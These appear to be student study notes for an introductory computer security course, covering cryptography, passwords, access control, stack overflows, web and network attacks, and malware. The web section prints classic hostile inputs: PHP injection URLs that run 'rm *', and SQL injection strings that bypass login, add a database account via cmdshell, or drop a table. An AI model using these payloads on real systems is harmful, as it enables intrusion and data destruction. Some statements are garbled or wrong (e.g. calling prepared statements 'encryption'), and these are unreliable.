Vous êtes sur la page 1sur 33

Definitions

Computer security deals with understanding and improving the behavior of


computing infrastructures in presence of adversarial threats
A vulnerability is a flow or weakness in a systems design, implementation, or
operation and management that could be exploited to violate the systems security
policy
The window of vulnerability is the time from when the vulnerability was introduced or
manifested in deployed software, to when access was removed, a security fix was
available/deployed, or the attacker was disabled
A zero-day vulnerability is a vulnerability unknown to the vendor
An exploit are pieces of software exploiting a vulnerability
Common Vulnerabilities and Exposures (CVE) system provides a reference-method
for publicly known vulnerabilities, run by MITRE
CVE identifiers are unique identifiers for vulnerabilities in publicly released software
packages
CVE identifiers are issued by CVE numbering authorities (CNAs)
Goals of Computer Security
Confidentiality: the property that information is not made available or disclosed to
unauthorized individuals, entities, or processes
Integrity: the property that data has not been changed, destroyed, or lost in an
authorized or accidental manner
Availability: the property of a system or a system resource being accessible and
usable upon demand by an authorized system entity, according to performance
specifications of the system
Authenticity: the property of being genuine and able to be verified and be trusted
Privacy: the right of an entity, acting in its own behalf, to determine the degree to
which it will interact with its environment, including the degree to which the entity is
willing to share info about itself with others
Security Examples
Secure Internet Communication: TLS (HTTPS), SSH, IPSec, PGP
WiFi Security: WEP, WPA, WPA2 (good)
Secure Storage: User knowns secret key, provider does not
Secure Messaging: End-to-end encryption (provider does not learn the keys)
Forward secrecy: Device compromise does not help decrypting previous
communication
Backward secrecy: System protected from long term key compromise
Kerchos Principle

States that a crypto system must be secure even if everything about the system,
except the key, is public knowledge
Adversary knows the specification of Kg, Enc, and Dec
No security by obscurity! (hidden specifications of encryption scheme still common in
industrial settings though)
A secure encryption scheme should hide all possible partial information and the
plaintext(s), since what is useful is usage-dependent
Common Attack Settings
Unknown plaintext attack: attacker only sees ciphertexts
Known plaintext attack: attacker knows additionally some plaintext-ciphertext pair
Chosen plaintext attack: attacker can arbitrarily choose what the plaintext are
Semantic Security
Semantic security is achieved when the encryption reveals nothing about the
plaintext, not even whether the same message was encrypted earlier
Every time we encrypt, the cipher text looks random to a computationally
bounded adversary. To ensure this, encryption must use randomization (many
possible ciphertexts for same message)
Masking
If we bitwise-xor a random string K to any string X, the outcome C = X XOR K is
random and independent of the original X, and thus hides everything about X (*the
probability of every possible K is exactly 1/(2^n))
Symmetric Cryptography
Symmetric cryptography considers the setting where the sender and the receiver
share the same secret key, and want to communicate securely in presence of an
adversary
Key generation algorithm (Kg), takes no input and outputs a (random) secret
key K
Encryption algorithm (Enc), takes input the key K and the plaintext M, outputs
ciphertext C <- Enc(K,M)
Decryption algorithm (Dec), is such that: Dec(K, Enc(K,M)) = M
Mono-Alphabetic Substitution Ciphers
Key Generation: Random one-to-one mapping of each character {A,B,...,Z} ->
{A,B,...,Z}

One-to-one mapping isnt very secure because it preserves the frequencies of each
letter in the text
Block Ciphers
A block cipher is a substitution cipher where the plaintext is made of blocks from a
very large alphabet, but with a very compact
Blocks are n-bit strings
There are (2^128)! permutations over 128-bit strings
Two examples of constructing block ciphers are DES and AES
Data Encryption Standard (DES)
(1) Split 64-bit input into L0, R0 of 32 bits each (2) Repeat round 16 times
(3) Each round applies function F using separate round keys K1...K16
derived from main key
Essentially broken (use 3DES which expands keyspace to 118 bits)
Advanced Encryption Standard (AES)
For k = 128 uses 10 rounds of permute and XOR in a round key derived
from K
Current block cipher standard
Pseudorandom permutation (PRP): a block cipher (e.g., AES) under a random secret
key behaves as an ideal substitution cipher with n-bit alphabet (security goal)
As long as the adversary does not learn the key, outputs on dierent inputs look
like random and independent strings
Problem: Two identical 16-byte sequences are still going to be encrypted in the same
way. As such, it is still back at encrypting images because it keeps similar patterns still.
Counter Mode Encryption (CTR)
Algorithm Enc(K,M):
Split M in blocks M[1],,M[r] *all blocks except possibly M[r] are n-bits
Picks random IV = {0,1}^n
C[0] <- IV
for i in range(1,r+1) do
P[i] <- Ek(IV + i)
C[i] <- M[i] XOR P[i]
return C[0],C[1],,C[r]
Note: If M[r] shorter than n bits, then also shorten P[r] as necessary
Masking strings, P[1],,P[r] generated upon each encryption will come from disjoint
parts of the block cipher domain (with high probability), and thus look random and
independent
Every encryption adds a new, independent mask to the plaintext, and thus (by our
previously established fact about masking) every ciphertext looks like a fresh random
string
Ciphertext Block Chaining (CBC)

Popular alternative to CTR


Algorithm Enc(K,M):
Split M into blocks M[1],,M[r] *all blocks are n-bits
Picks random IV = {0,1}^n
C[0] <- IV
for i in range(1,r+1) do
P[i] <- Ek(M[i] XOR C[i-1])
returns C[0],C[1],,C[r]
Note: You must pad the last block M[r] in order to run this algorithm
Problem: Susceptible to the Padding Oracle Attack
Stream Ciphers
Stream ciphers generates a stream of masks
Message Authentication (Integrity)
Integrity must also be achieved for every encryption scheme
If an adversary tampers with ciphertexts sent by someone, the receiver must be able to
detect it
Message Authentication Code (MAC) is an ecient algorithm that takes a secret key,
a string of arbitrary length, and outputs an (unpredictable) short output/digest
A MAC satisfies unforgeability if it is unfeasible for an adversary to output M not
previously send by the correct sender
Using a hash function H to build a MAC is called HMAC
There is also the CBC-MAC which satisfies unforgeability if Ek is a secure PRP
Hash Functions
Hash function (H) maps arbitrary bit string to fixed length string of size m
Security goals:
Collision resistance: Cannot find M != M such that H(M) = H(M)
Preimage resistance: given H(M) cannot find M
Second-preimage resistance: given H(M) cannot find M so that H(M) = H(M)
Example Hash Functions
MD5: m = 128 bits (broken)
SHA-1: m = 160 bits (broken)
SHA-256: m = 256 bits
SHA-3: m >= 224 bits
SHA-512
Authenticated Encryption
Can ensure security by combining a MAC and a semantically secure encryption

channel
Encrypt-then-MAC (EtM) is the best option (consists of two keys: one for Enc, one for
MAC)
Decryption: Given C* = C || T first check T valid tag for C using K'
If so, decrypt C, and output result
If not, output error"
EtM is secure as long as the encryption scheme is semantically secure, and
MAC is unforgeable
Integrity: If the attacker sees C* = (C,T), and wants to change this to a valid C** =
(C', T') where C' != C, then it needs to forge the MAC (i.e. produce a new tag T'
for C')
Confidentiality: C* = C || T does not leak more information about plaintext than
C, because T is computed from C directly, and does not add extra information
about plaintext
MAC-then-Encrypt (MtE) is a bad option because you must decrypt the ciphertext
every time before checking for authentication
Susceptible to padding-oracle attack
MtE is semantically secure but doesnt ensure integrity
If encrypting everything with a semantically secure encryption scheme,
then no information about the plaintext (and the tag) is leaked
Doesnt ensure ciphertext integrity because we are able to produce a
ciphertext dierent than the one we have seen, which is still valid
Ensures plaintext security, because even if we can create a new valid
ciphertext, it still decrypts to the same message M
Encrypt-and-MAC (E&M) is a bad option because T is computed directly from M,
which may reveal information about the original plaintext. Identical messages will map
to the same MAC so the adversary can just look at the first few blocks and guess
information about similar previous books to start cracking the plaintext. Thus, you can
mount a chosen-plaintext attack.
E&M is not semantically secure and doesnt ensure integrity
MAC part of the ciphertext depends deterministically on a message,
meaning the tag doesnt change if you re-encrypt the same message
twice
Doesnt ensure ciphertext integrity because we are able to produce a
ciphertext dierent than the one we have seen, which is still valid
Ensures plaintext security, because even if we can create a new valid
ciphertext, it still decrypts to the same message M
Common solution is GCM which is essentially CTR-mode + a very lightweight MAC
(widely used in TLS, Wgig, SSH, )
WEP
Wired Equivalent Privacy is authenticated encryption used to protect wireless
communications in original IEEE 802.11 Wifi standard
Subject to a number of flaws, allow gaining access/decrypting trac within minutes

Padding-Oracle Attacks
Works on CBC (if not using authenticated encryption)
Utilize PKCS #7 Padding for CBC padding technique
Looks at how many bytes are missing and fills remaining k bytes with that value
k
The attack relies on having a "padding oracle" who freely responds to queries about
whether a message is correctly padded or not
Utilized calculations:
C XOR M = P (use this to find P, hit padding oracle with C until you can assume
the value of M)
C XOR P = M
Solutions:
BAD: Use CTR
BAD: Try not to leaking padding-oracles
GOOD: Use authenticated encryption
Public-Key Encryption Scheme
A public-key encryption scheme consists of three algorithms Kg, Enc, and Dec
Kg takes no input and outputs a random public-key/secret-key pair (PK, SK)
Enc takes input the public key PK and the plaintext M, outputs ciphertext C <Enc(PK, M)
Dec is such that Dec(SK, Enc(PK,M)) = M
Public Key (PK) is known to everyone but the Secret Key (SK) is only known to the
receiver
RSA Encryption
RSA Setup
p and q can be large prime numbers (e.g. around 2^2048 *referred to as 2048bit primes)
N = pq called the modulus
Z_n* = {i | gcd(i,N) = 1} *consists of all integers i such that the gcd is equal to 1
gcd(i,N) is the greatest common divisor
Z_n* is closed under multiplication

N = 15, e = 3, d = 3 gives e*d mod 8 = 1

RSA is not a full-fledged PKE scheme because it is deterministic


If we encrypt the same message twice, we get the same message
Solution: Pad message M to be encrypted into an element, using random bits
Learning p,q from N is a factoring problem. It is really hard to do this because the
runtime is sqrt(N)
Hybrid Encryption
PKE = (PKE-Kg, PKE-Enc, PKE-Dec)
AE = (AE-Kg, AE-Enc, AE-Dec)
Goal: Client and server agree on key K for AE
After agreeing on a secret key K, the client and the server can exchange measures
(very fast) using authenticated encryption
Problem: Susceptible to man-in-the-middle attacks
Man-in-the-Middle Attacks
Adversary can sit between client and server and agree individually with server and
client on two dierent keys
Adversary can now intercept all trac between client and server without client and
server noticing
Public-key cryptography enables individuals to generate their own key pairs, but we
need a way to decide whether a (public) key is legitimate
Example: If we connected to Google in TLS, receive PK - how do we know
whether PK = PK_google (and not something else sent by a man-in-the-middle)
We need a mechanism that allows us to trust PKs eciently but correctly:
certifications
If A knows that PK_B belongs to a trust (in the eyes of A) entity B, and B knows
that PK_C belongs to a trusted (in the eyes of B) entity C, then A should also
trust C and PK_C
This validation can be achieved through digital signatures
Digital Signatures

The public-key version of a MAC


A digital signature scheme consists of three algorithms Kg, Sign, and Verify
Kg takes no input and outputs a (random) verification key/signing key pair (VK,
SK)
Sign takes input the signing key SK and the plaintext M, outputs ciphertext S <Sign(SK, M)
Verify is such that Verify(VK, (M, Sign(SK,M))) = valid
Unforgeability means that the adversary must not be able to generate valid S for M
not sent by the real sender, even given VK
Certifications
Certifications is a business, based on trust, with some major key players
Generally, the more trustworthy the organization issuing the certificate, and the more
vetting they do, the more expensive the certificate is
Trusted Certification Authorities (CAs) issue certificates for each use of the CA by
signing their public key with the CAs own sign key
Authentication is one-sided, as a server doesnt know who it is talking with. This
prevents MitM attacks because the adversary cannot forge a certificate for a key for
which he/she knows the secret key
Servers also want to know who it is talking to, this type of authentication can be
implemented through the use of passwords
Having one (or a few) CAs is not feasible - we need to produce a huge number of
certificates and establishing trust is costly.
Solution: Adopt a hierarchy: the hierarchical public-key infrastructure (PKI)
Certificates come with a valid date range (browser rejects invalid certificates)
Certificates can revoked, implemented through certificate revocation lists (CRLs),
published by CAs
Hierarchical PKIs
Browsers only need to trust root CAs
Issuing CAs issue actual certificates
CA on higher levels issue a certificate for CA on lower level *doesnt have to be a tree
Passwords
A password is a secret string used as a piece of information for authentication
A passphrase is often longer than a password, with the structure of a proper phrase
There are two conflicting goals when choosing passwords: we want something hard to
guess, but easy to remember
Passwords are susceptible to both online attacks and oine attacks
Passwords are stored in password files and hashing is used to hide true value of the
password (in case an adversary gains access to this file)

Online Attacks
Trying multiple passwords on the server
Online attacks are easy to mitigate because the # of trials/username/unit of time
can be reduced
Prevent leaking valid usernames via generic error messages
Oine Attacks
If a password file has been stolen then the adversary can conduct an oine attack
Oine attacks are the most common attack scenario
Attacker can compute as much as he or she wishes
Password Hashing
Password hashes are stored in password files instead of the true value of the
password
Hashing functions include MD5, SHA-256, etc.
Upon receiving a password for a user, the server checks whether entry user: H(pass)
exists in passwd file
Problem: If two users use the same password and the adversary gains access to one
password, it will have found the other. Salting must be used to fight against this. If this
isnt used then rainbow tables can be used to crack passwords
The original UNIX DES-based password hashes use the first two characters as the salt.
It supports 8-char passwords and 2-char salts.
glibc password hashes (better)
Comes in the form: $hash_algo_num$salt$hash
The hash_algo_num can be: 1 = MD5, 5 = SHA-256, 6, SHA-512
Salt comes from [a-zA-Z0-9./], and hash is encoded with these characters too
(base 64)
SHA-256 is slower (good thing) than SHA-512. Both are better than MD5
Brute-Force Attack
Try all possible passwords in increasing length, and check if the hash matches
We can slow down a brute-force attack by making computation of hash functions more
costly. Iteration aka key-stretching can make computer of a password hashes c times
slower by making it iterate through c times
Dictionary Attacks
Attempt common passwords according to some dictionary, in decreasing frequency
of likelihood

Best attacks are a clever combination of dictionaries, brute force, and manipulations of
words in dictionary according to rules
Salting
Every time a new password is added to a password file, computer a random string
called the salt
You append this salt to the final hash in the password file
Password Files
In UNIX-based systems, passwords are stored in the /etc/shadow file
/etc/passwd and /etc/shadow are usually similar, but the actual password hash is
stored only in the latter
Multifactor Authentication
Combining multiple authentication methods for stronger security (ex. gmails multifactor authentication)
Password-based Cryptography
Using password instead of secret keys making it easy to memorize and avoids
expensive secure storage of keys
Password-based Key Derivation (PBKDF) is used with symmetric encryption in order
to create password-based encryption

Multi-User Systems
In general, multiple users may authenticate to access a system and they may share
resources

There needs to be multiple levels of security for this system to limit what certain users
can do over others. This is where security policies come in
Security Policies
A security policy is a statement that partitions the states of the system into a set of
authorized (or secure) states and a set of unauthorized (or non-secure) states
A secure system is a system that starts in an authorized state and cannot enter an
unauthorized state
These policies involve:
Subjects: people, users, employees, ...
Objects: files, documents, physical locations, ...
Actions: read, write, open, edit, append, ...
Mandatory Access Control (MAC)
Security decisions are made by a central policy administrator (ex. Bell-LaPadula)
Reference monitors and security kernels are system components that monitors
accesses to data for security violations. These may be kernel, hypervisor, within
applications (Apache)
It is essentially impossible to implement a good system wide MAC because implicit
covert channels allow bypassing
Discretionary Access Control (DAC)
Users decide access to their own files
There are two common implementation paradigms
Access control lists: column store with file (UNIX)
ACLs requires authenticating user
Processes must be given permissions
Reference monitor must protect permissions setting
Delegation: process run by user inherits users permissions
Revocation: remove user from list
Capabilities: row stored for each user (Amoeba, Eros)
Token-based approach avoids need for authentication
Tokens can be passed around
Reference monitor must manage tokens
Delegation: process can pass around token
Revocation: N/A (kinda dicult)

Unforgeable tickets given to user (think: movie ticket, house key)


Permission Roles
A group is a set of users which can simplify assignment of permissions at scale (ex.
administrator, user, guest, etc.)

Permissions are set by owner/root


Resolving permissions:
If user = owner, then owner privileges
If user in group, then group privileges
Otherwise, all privileges
Process (normally) runs with permissions of user that invoked process
/etc/shadow owned by root
x86
CISC (complex instruction set computing) with over 100 distinct opcodes in the set
Only 8 registers of 32-bits and only 6 are general-purpose
Variable-length instructions
Little-endian architecture
Processor Memory Layout

.text: machine code executable


.data: globally initialized variables
.bss: below stack section, uninitialized variables
heap: dynamic variables (malloc)
stack: local variables and function call data
Env: environment variables and program arguments
The Stack

Holds (static) part of local storage and keeps data that doesnt fit into registers
Grows from high to low addresses
Within a function, lowest part of the stack (stack frame) is assigned to that function
%ebp (base pointer) stores top of current stack frame"
%esp (stack pointer) stores bottom of stack frame"
Code that does this is said to smash the stack, and can cause return from the routine
to jump to a random address
Munging EBP is when function() returns and stack corrupted because stack
frame pointed to wrong address
Munging EIP is when function() returns and jumps to address pointed to by the
EIP value saved on the stack (i.e. control-flow hijacking)
AT&T Instructions
Instruction ends with data length
Format is: opcode, src, dst
Constants preceded by $
Registers preceded by %
Register Instructions
subl: subtract from a register value
Frame Instructions

pushl: put a value on the stack


Pull from register, value goes to %esp, subtract from %esp
popl: take a value from the stack
Pull from stack pointer, value goes from %esp to register, add to %esp
Control Flow Instructions
jmp: %eip points to the currently executing instruction
call: saves the current instruction pointer to stack and jumps to the argument
value
ret: pops the stack into %eip, the instruction pointer
Stack Instructions
leave: moves %esp to %ebp and pop o %ebp
Function Calls
Locals are organized into stack frames and callees exist at lower addresses than the
caller
On call:
Saves %eip so you can restore control
Save %ebp so you can restore data
Buer Overflow/Code Injection
W ^ X, mark memory page as either writable or executable but never both
In particular: make heap and stack non-executable
System crashes upon:
ESI hits a W-page
Instruction writes into X-page
W ^ X technologies
AMD64: NX bit (Non-executable)
IA-64: XD bit (eXecute Disabled)
ARMv6: XN bit (eXecute Never)
Common idea:
Extra bit in each page table entry
Processor refuses to execute code if bit = 1
Mark heap and stack segments as such
Page table (managed by OS) is responsible for address conversion and setting
W or X access of memory pages
You can disable this with:
mprotect(): allows processes to set permissions on memory pages
execstack: sets flag in ELF binaries on whether code is executable on
stack or not
Susceptible to return-into-libc exploits
Return-into-libc Exploits

libc is the standard C library, included in all processes, which exists on the heap. All
libc functions are marked executable at fixed addresses
system() - executes commands on the system
Overwrite EIP with address of system() function
junk2 just some filler returned to after system call
First argument to system() is ptr to /bin/sh"
We know where /bin/sh is by setting an environment variable
Countermeasures include:
Requiring to pass first argument in %eax
ASCII armoring: making sure that libraries are at addresses that contain NULL
bytes
Address Space Layout Randomization (ASLR)
A memory-protection process for operating systems that guards against bueroverflow attacks by randomizing the location where system executables are loaded
into memory
More eective for 64-bit architectures
Still susceptible to:
If W^X not on, a large nop-sled with classic buer overflow
Brute force attacks on address
Vulnerabilities used to leak address information (e.g., printf arbitrary read)
Stack Canaries

We can protect the return address from being overwritten by placing canary values on
the stack. At the end of the function, we check that the canary value is correct, if not,

fail safe
Canary value can be:
Random value (choose once for whole process), must be hidden well
NULL bytes/EOF/etc. (string functions wont copy past canary)
You can activate stack canaries in gcc with -fstack-protector and -fstack-protectorstrong. You can also deactivate with -fno-stack-protector
Stack Guard and ProPolice are more modern stack protection techniques. For
example, ProPolice also makes sure that on-stack pointers are put on lower addresses
than buers
HTTP Basics

Browser Execution
Retrieve/load content
Render it by processing the HTML
Might run scripts, fetch more content, etc.
Respond to events
User actions: OnClick, OnMouseover
Rendering: OnLoad, OnBeforeUnload
Timing: setTimeout(), clearTimeout()
HTTP Cookies
Main mechanism to keep state across HTTP requests
Session cookies are valid until browser is closed
Persistent cookies are valid until an expiration date
Secure cookies are only sent over HTTPS connection

HttpOnly cookies are not visible by client side script language (like JavaScript)
Setting a cookie
Set a cookie with information in HTTP Header
Default scope of a cookie is the domain and path of setting URL
If previous cookie with same name, domain, and path then it is overwritten
Set a cookie dynamically server-side or client-side
Deleting a cookie
Set cookies expire date to the past
Browsers send all cookies such that:
Domains cope is a sux of url-domain
Path is prefix of its url-path
Protocol is HTTPS if cookies marked secure"
Security Issues
No integrity
HTTPS cookies can be overwritten by HTTP cookies
Malicious clients can modify cookies
Scoping rules can be abused
blog.example.com can read/set cookies for example.com
Privacy
Cookies can be used to track you around the Internet
Susceptible to session hijacking if HTTP cookies sent in clear
Session Hijacking
The exploitation of a valid computer session - sometimes also called a session key - to
gain unauthorized access to information or services in a computer system
Unencrypted contents are very easy to retrieve, as such, use encryption when setting
session cookies
SessID = Enc(K, info) where K is server-side secret key and info contains user id,
expiration time, and other data
This doesnt prevent Firesheep hijacking so turn on HTTPS always
PHP Vulnerabilities
PHP command eval(cmd_str) executes string cmd_str as PHP code
//calc.php
$in = $_GET[exp];
eval($ans = .$in.;);

http://example.com/calc.php?exp=11;system(rm *)"
//sendmail.php
$email = $_POST[email]

$subject = $_POST[subject]
system(mail $email -s $subject < /tmp/joinmynetwork)

http://example.com/sendmail.php?
email=abouttogetowned@ownage.com&subject=food</usr/passwd;ls"
File handling: example.com/file_handle.php?i=file.html
Global variables: example.com/globl_var.php?user=bob;$auth=1;"
Web Vulnerabilities
SQL injection inserts malicious SQL commands to read/modify a database
Cross-site Request Forgery (CSRF) in which Site A uses credentials for Site B to do
a bad thing
Cross-site Scripting (XSS) in which Site A sends victim client a script that abuses
honest Site B
SQL Injection
set ok = execute(SELECT * FROM Users
WHERE user= & form(user) & "'
AND pwd= & form(pwd) & ');
if not ok.EOF
login success
else fail;

user=OR 1=1 --"


Easy login (-- tells SQL to ignore rest of line)
user=; exec cmdshell net user badge badpw add"
Attack gets account on database server if SQL database running with correct
permission
user=; DROP TABLE Users"
Deletes all customer information
Prevent SQL injection using encryption
$stmt = $db->prepare(select * from users
where username = :name and password = SHA1(CONCAT(:pass, salt))
limit 1;);
$stmt->bindParam(:name, $name);
$stmt->bindParam(:pass, $pass);

Cross-site Request Forgery (CSRF/XSRF)


Site A uses credentials for Site B to do a bad thing

Form post with cookie


User browser already logged onto victim site
User visits attacker site which forces user browser to send auth cookie to victim
site. This works because of cookie scoping rules
Login CSRF
Attacker creates host account on trusted domain
Attacker forges login request in victims browser with the host account
credentials
Attacker now has access to any data or metadata the victim creates while their
browser is logged in with the host account
Defenses include secret validation tokens, referrer validation, and custom HTTP
headers
Secret Validation Tokens
Include token with large random value or HMAC of a hidden value sent to
client e.g. via cookie
The attacker cannot forge the token and the server validates it
Referrer Validation
Check that the referrer is from the correct domain
Lenient policy: allow if referrer is not present
Strict policy: disallow if referrer is not present
Problem is that referrers are often stripped since they may leak
information. HTTPS to HTTP the referrer is tripped. Clients and
networks might also strip referrers
Custom Headers (via AJAX)
Adds header entry: X-Requested-By: XMLHttpRequest
Server rejects request if entry is missing
This helps because, by default, requests to dierent domains are not
allowed (same-origin-policy)
Cross-site Scripting (XSS)
Site A tricks client into running script that abuses honest site B
Reflected attacks (non-persistent) (e.g., links on malicious web pages)
Visit site -> receive malicious link -> click on link -> echo user input -> sends
valuable data
Stored (persistent) attacks (e.g., web forms with HTML)
Malicious script is stored victim server -> request content -> receive malicious
script -> send valuable data
Defenses include input validation, output filtering/encoding, HTTPOnly cookies, Taint
mode, etc.
Input validation
Only allows what you expect
Output filtering/encoding
Remove/encode special characters, allow only safe commands

Malware
Malicious code installed by a victim user that:
Fulfills malicious intent of author
Performs some unwanted activity on your system
Phishing means tricking the user into downloading malware, submitting CC or account
info to attacker, etc.
Malware is so prevalent today because data and code are mixed, a homogenous
computing base, unprecedented connectivity, a clueless user base, and it has become
profitable

Miscellaneous malware examples:


Keyloggers log keystrokes on a given system (e.g., to find passwords, account
number, etc.)
Adware collect information for commercial gain. It is often installed along with
normal software downloaded
Rootkits are designed to hide existence of malware
Computer Viruses
A virus is a program that reproduces its own code by attaching itself to other
executable files in such a way that the virus code is executed when the infected
executable file is executed
Viruses reproduce/infect then deliver some type of payload, similar to biological viruses
Typical virus actions include: displaying messages, deleting and/or manipulating files,
and installing additional malware/open backdoor
A memory-resident virus remains in memory as part of the operating system, until
system shuts down. It also reacts to system events

A boot sector infector is a computer virus that infects boot section, and is executed
every time disk is accessed/boot sector is loaded (e.g., elk cloner)
The boot sector is part of disk used to bootstrap the system or mount a disk.
Code in BS is executed when system sees disk for the first time
An executable infector is a virus that infects executable programs. The virus code is
appended or prepended to executable code and data (e.g., chernobyl virus)
Stealth viruses cancel infection of files. For example, they intercept requests to
infected files, and make them look normal (e.g., 4096, IDF virus)
Stealth feature requires running the infected executable, virus may be detectable
as long as it is not executed once
To prevent detection from anti-virus software, an encrypted virus will encrypt the virus
code with a fresh cryptography key at every encryption, and decrypt at run-time before
executing
Because deception procedures dont change, only the encrypted portion and key:
a polymorphic virus changes every time it is inserted into another program
Inserts bogus random instructions with not eect on a actual which change
every time the virus infects a new program. These actions may include dead
code insertion, instruction reordering, or instruction substitution
Macro viruses use macro-scripting languages in application documents
Trojans
Milder forms of viruses that usually not self-replicating
They act as a useful server but carry out malicious behavior, typically opening a
backdoor to the system (e.g., SMS.AndroidOS.Stealer.a, banking trojans)
Computer Worms
A program that copies itself from one computer to another (e.g., Morris worm)
Botnets
A network of private computers infected with malicious software and controlled as a
group without the owners knowledge
Usage: spam, DDoS, SEO, trac generation, etc.
Can make money through: rental, DDoS extortion, bulk trac selling, click fraud, theft
of monetizable data, data ransom, product advertisement, etc.
Well-known botnets include Agorot (2002) and Storm Botnet (2007)
Anti-Virus Software
Helps you detect viruses on your computer
Signature-based detection compare machine-code with DB of known viruses
Heuristic-based detection looks for typical virus-like machine code

Behavioral-based detection looks for virus-like behavior


Sandbox detection tests the software in virtual environment
Components of anti-virus program:
Engines for various languages because malware comes in various forms (e.g.,
binary executables, java applets, flash videos)
File scanners to scan various types of files
Compressor and archivers because malware can come compressed
Packet filters and firewalls to prevent bots from contacting their C&C servers
Self protection mechanisms to prevent malware from disabling the anti-virus
An anti-virus program can discover known malicious patterns in programs, documents,
web pages, or network trac but it cannot discover new threats unless they are based
on old patterns
Malware Prevention
Use blacklists to recognize IP addresses that are involved in malware activity and
block any trac directed to/from them
Protect against infected computers by telling users when a certain computer
they are trying to communicate with is known to be infected with malware
Protect against malicious servers by telling users whether the server/webpage
they are communicating with is malicious
Use user voting and reputation to pinpoint webpages, servers, or messages that are
malicious
Internet Protocol Stack

WiFi
Most common way to connect to a network
Implements IEEE 802.11 standards, a family of standards with dierent
bandwidth/throughput/frequencies
Protocol coordinates access to channels to avoid collisions
Logical units identified through so-called SSIDs (this is what you see when
connecting to a network
Every signal can easily be captured through packing sning. A WiFi device can often
be put into monitor mode such that it sees every packet sent over a WiFi channel
The solution to this WPA2
WPA2-PSK
Device and access points share pre-shared secret PSK (aka PMK, pairwise master
key), derived from a passphrase and SSID
Upon connect, 4-way handshake protocol generates temporary session key PTK

Encrypts datagrams using authenticated encryption (AES-based counter mode


+ CBC) with key = PTK
Each connection uses a fresh PTK
Given an intercepted handshake interaction, it is possible to brute-force the
passphrase and obtain the PTK. This is because MIC is a MAC on public
information + password guess
WPA-EAP
EAP stands for enterprise"
Authentication requires online authentication server (Remote Authentication Dial-In
User Server, RADIUS, server)
Radius server can rely on existing authentication backend for authentication
(LDAP/active directory)
Certificate needs to be given reliably to user to authenticate network
IP Protocol (IPv4)
Connectionless: no state
Unreliable: no guarantees
ICMP (Internet Control Message Protocol): error messages, etc.
Security Issues:
Anyone can talk to anyone
No source address authentication in general (spoofing can occur)
IP allows datagrams of size from 20 bytes up to 65535 bytes but some link layers only
allow MTU, maximum transmission unit) of 1500 bytes. IP utilizes fragmenting in order

to deal with this, figuring out MTU of next link and fragmenting packets if necessary
into smaller chunks
Fragmentation attacks:
Ping of death: allows sending 65,536 byte packet overflowing buer
This is because max oset is 65528 but we can now actually still include
more data that goes beyond the end of the buer
Teardrop DoS: mangled fragmentation crashes reconstruction code (sets
osets so that two packets have overlapping data)
Prevent spoofing:
Use authentication based on key exchange between the machines on your
network; something like IPsec will significantly cut down on the risk of spoofing
Use an access control list to deny private IP addresses on your downstream
interface
Implement filtering of both inbound and outbound trac
Configure your routers and switches if they support such configuration, to reject
packets originating from outside your local network that claim to originate from
within
Enable encryption sessions on your router so that trusted hosts that are outside
your network can securely communicate with your local hosts
Denial of Service (DoS) Attacks
Goal of these attacks is to prevent legitimate users from accessing victim servers
ICMP ping flood achieves this by sending ICMP pings so fast that the victims
resources are overwhelmed
An ICMP echo message must be responded with echo reply containing the
exact data received in the request message
To avoid ingress filtering: an attacker can send packet with a fake source IP so
the packet will get routed correctly, but the replies will not
DoS reflection attacks bounce attacks o another server
DoS works better when there is asymmetry between victim and attack. This way
an attacker uses few resources to cause victim to consume a lot of resources
BCP 38
Upstream ingress filtering to drop spoofed packets
Before forwarding on packets, check at ingress that source IP is legitimate
Doesnt stop DoS attacks because:
Requires widespread adoption and compliance
More and more DoS-attacks do not use spoofing but instead Botnets and
Distributed DoS attacks (DDoS)
TCP (Transfer Control Protocol)
Connection-oriented: state initialized during handshake and maintained

Reliability is a goal: generates segments, timeout segments that arent attacked,


checksum headers, reorders received segments if necessary, flow control
TCP handles missing messages/re-sent/etc.
Connections
Every connection is labeled by ClientIP:ClientPort and ServerIP:ServerPort
When new connection created by client (new socket), typically client chooses
random ClientPort
Server must be listening on ServerPort, creating a passive socket
New connections handled by separate thread
Socket simply looks like a file with read/write interface once connection is open
Connection Logic
Packets sent from client/server are assigned increasing sequence numbers
seqC and seqS, initialized when establishing connection
Also each packet contains as the acknowledgement number the sequence
number of the previously received packet + 1
TCP Handshake
Protocol establishes a TCP session between Client C and Server S

SYN = syn flag set


ACK = ack flag set
Sequence numbers are the main mechanism for reliability allowing us to know
how packets are to be ordered
Because the server needs to allocate memory to remember that a SYN/ACK
message was sent back to the client, it makes it susceptible to TCP SYN floods
TCP Teardown

TCP SYN Floods


If you you overload a server with TCP SYN packets you can perform a DoS attack
A server maintains state for each SYN packet for some amount of time. If it is
not cleverly implemented then the server will run out of memory
You can use a SYN cookie to fight against SYN floods. The server wont allocate
memory for the SYN until it receives the correct ACK response and it will recreate the
SYN entry from the cookie
Predictable Sequence Numbers
4.4BSD used predictable initial sequence numbers (ISN)
As system initialization, set iSN to 1
Increment ISN by 64,000 every half-second
A clever attacker can forge a FIN packet or forge some application-layer packet
(assuming spoofing is possible)
A good fix is to use a random ISN for every connection
Domain Name Service System
We dont want to have to remember all IP addresses so the DNS system was created
It is a hierarchical system start from root name servers

A root name server is a name server for the root zone of the DNS of the Internet
It directly answers requests for records in the root zone and answers other
requests by returning a list of the authoritative name servers for the appropriate
top-level domain (TLD)
DNS cache poisoning is when an attacker utilizes a DNS server using a predictable
UDP port to redirect trac meant for one place to another by abusing the victims DNS
server
You flood the victim name server with forged answers, guessing the QID, until
one of them hits correct in which the victim is routed to a malicious site
You can also poison cache for NS record instead and take over all of the second
level domain
Defenses against DNS cache poisoning include:
Randomizing UDP ports (e.g., Dan Bernsteins DJBDNS)
Randomizing QIDs (there are 65,536 possible ones)
DNSec: cryptographically sign DNS responses and verify via chain of trust from
roots down
Classless Inter-Domain Routing (CIDR) Addressing
128.168.0.0/24
a.b.c.d/x

x indicates number of bits used for a routing prefix


IP addresses with same /x prefix share some portion of route
Prefixes used to setup hierarchical routing:
An organization assigned a.b.c.d/x manages addresses prefixed by a.b.c.d/x
Autonomous systems (AS) are organizational building blocks which consists of a
collection of IP prefixes under a single routing policy
Within AS, might use RIP (Routing Information Protocol) or OSPF (Open Shortest Path
First) but the best to use is BGP (Border Gateway Protocol)
BGP
Policy-based routing: AS sets policy about how to route based on economic, security,
and political considerations
BGP routers use TCP connections to transmit routing information
Iterative announcement of routes
BGP is unauthenticated so anyone can advertise any routes. These false routes will
also be propagated allowing for IP hijacking
AS announces it originates a prefix it shouldnt
AS announces it has shorter path to a prefix
AS announces more specific prefix
Target Acquisition
To find vulnerable server(s) within a target organization we can first start with one or
